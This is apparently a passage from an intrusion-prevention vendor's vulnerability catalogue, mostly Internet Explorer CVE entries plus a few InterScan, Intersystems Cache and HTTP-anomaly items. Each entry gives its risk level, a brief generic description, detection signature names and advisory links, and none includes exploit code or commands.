Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3142

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3142

References:

CVE-2013-3142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3142

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030
File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030-2

References:

CVE-2013-0030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0030

OSVDB-90127
http://www.osvdb.org/90127

MS13-010
http://technet.microsoft.com/security/bulletin/MS13-010

Internet-Explorer-Vulnerability-CVE-2016-0002

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Explorer.

Situation:

File-Text_Internet-Explorer-Vulnerability-CVE-2016-0002

References:

CVE-2016-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0002

MS16-001
http://technet.microsoft.com/security/bulletin/MS16-001

Internetoptimizer

About this vulnerability:	InternetOptimizer
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	InternetOptimizer
Type:	Misconfiguration
Description:	InternetOptimizer is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Internetoptimizer HTTP_CSH-Internetoptimizer

Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a buffer overrun vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666

References:

CVE-2019-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0666

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a security bypass vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768

References:

CVE-2019-0768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0768

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665

References:

CVE-2019-0665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0665

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667

References:

CVE-2019-0667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0667

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680

References:

CVE-2019-0680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0680

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763

References:

CVE-2019-0763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0763

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists an arbitrary pointer dereference vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884

References:

CVE-2019-0884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0884

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794

References:

CVE-2019-0794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0794

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752

References:

CVE-2019-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0752

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753

References:

CVE-2019-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0753

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411

About this vulnerability:

An attempt to exploit a vulnerability in Internet Explorer detected

Risk:

High

First detected in:

sgpkg-ips-1327-5242

Last changed:

sgpkg-ips-1697-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit a memory corruption vulnerability in Internet Explorer. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2021-26411
File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411

References:

CVE-2021-26411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26411

ms21-mar
http://technet.microsoft.com/security/bulletin/ms21-mar

Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968

References:

CVE-2020-0968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0968

ms20-apr
http://technet.microsoft.com/security/bulletin/ms20-apr

Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1347-5242

Last changed:

sgpkg-ips-1347-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419

References:

CVE-2021-26419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26419

ms21-may
http://technet.microsoft.com/security/bulletin/ms21-may

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1229-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824

References:

CVE-2020-0824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0824

ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1229-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832

References:

CVE-2020-0832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0832

ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1229-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833

References:

CVE-2020-0833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0833

ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1229-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847

References:

CVE-2020-0847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0847

ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar

Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1369-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a scripting engine vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448

References:

CVE-2021-34448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34448

ms21-jul
http://technet.microsoft.com/security/bulletin/ms21-jul

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920

References:

CVE-2019-0920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0920

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1195-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238

References:

CVE-2019-1238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1238

ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1195-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239

References:

CVE-2019-1239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1239

ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216

References:

CVE-2020-1216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1216

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230

References:

CVE-2020-1230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1230

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1249-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035

References:

CVE-2020-1035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1035

ms20-may
http://technet.microsoft.com/security/bulletin/ms20-may

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1249-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060

References:

CVE-2020-1060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1060

ms20-may
http://technet.microsoft.com/security/bulletin/ms20-may

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1249-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062

References:

CVE-2020-1062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1062

ms20-may
http://technet.microsoft.com/security/bulletin/ms20-may

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a Use-After-Free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213

References:

CVE-2020-1213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1213

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a Use-After-Free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214

References:

CVE-2020-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1214

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a Use-After-Free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215

References:

CVE-2020-1215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1215

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793

References:

CVE-2019-0793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0793

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862

References:

CVE-2019-0862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0862

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918

References:

CVE-2019-0918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0918

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1159-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930

References:

CVE-2019-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0930

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988

References:

CVE-2019-0988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0988

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005

References:

CVE-2019-1005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1005

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055

References:

CVE-2019-1055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1055

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1195-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060

References:

CVE-2019-1060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1060

ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1201-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390

References:

CVE-2019-1390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1390

ms19-nov
http://technet.microsoft.com/security/bulletin/ms19-nov

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1201-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429

References:

CVE-2019-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1429

ms19-nov
http://technet.microsoft.com/security/bulletin/ms19-nov

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1217-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674

References:

CVE-2020-0674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674

Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1256-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260

References:

CVE-2020-1260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1260

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

InterScan-VirusWall-Directory-Traversal

About this vulnerability:	A vulnerability in InterScan VirusWall
Risk:	High
First detected in:	sgpkg-ips-416-4219
Last changed:	sgpkg-ips-1602-5242
Platform:	Windows
Software:	InterScan VirusWall
Type:	Directory Traversal
Description:	The proxy product within TrendMicro InterScan is vulnerable to a directory traversal attack. A remote attacker can enumerate the underlying file system and access files that are not meant to be accessible to the attacker. Since TrendMicro Interscan runs under LOCAL_SYSTEM privileges, it is possible for the remote attacker to gain access to all the files on the remote server.

Intersystems-Cache-DoS-1

About this vulnerability:	A vulnerability in Intersystems Cache, allowing DoS.
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Intersystems Cache
Type:	Malfunction
Description:	A vulnerability exists in Intersystems Cache for Windows which allows for a DoS attack.
Situation:	HTTP_CSU-Intersystems-Cache-DoS-1

Intersystems-Cache-DoS-2

About this vulnerability:	A vulnerability in Intersystems Cache, allowing DoS.
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Intersystems Cache
Type:	Malfunction
Description:	A vulnerability exists in Intersystems Cache for Windows which allows for a DoS attack.
Situation:	HTTP_CSU-Intersystems-Cache-DoS-2

Invalid-Base64-Cookie

About this vulnerability:	Invalid Base64-encoded cookie field
Risk:	Moderate
First detected in:	sgpkg-ips-612-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Invalid HTTP headers may be used to mask botnet control traffic.
Situation:	HTTP_CSH-Invalid-Base64-Cookie

Invalid-Basic-Authentication-Base64

About this vulnerability:	Invalid Characters in HTTP Basic Authentication detected
Risk:	Low
First detected in:	sgpkg-ips-500-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
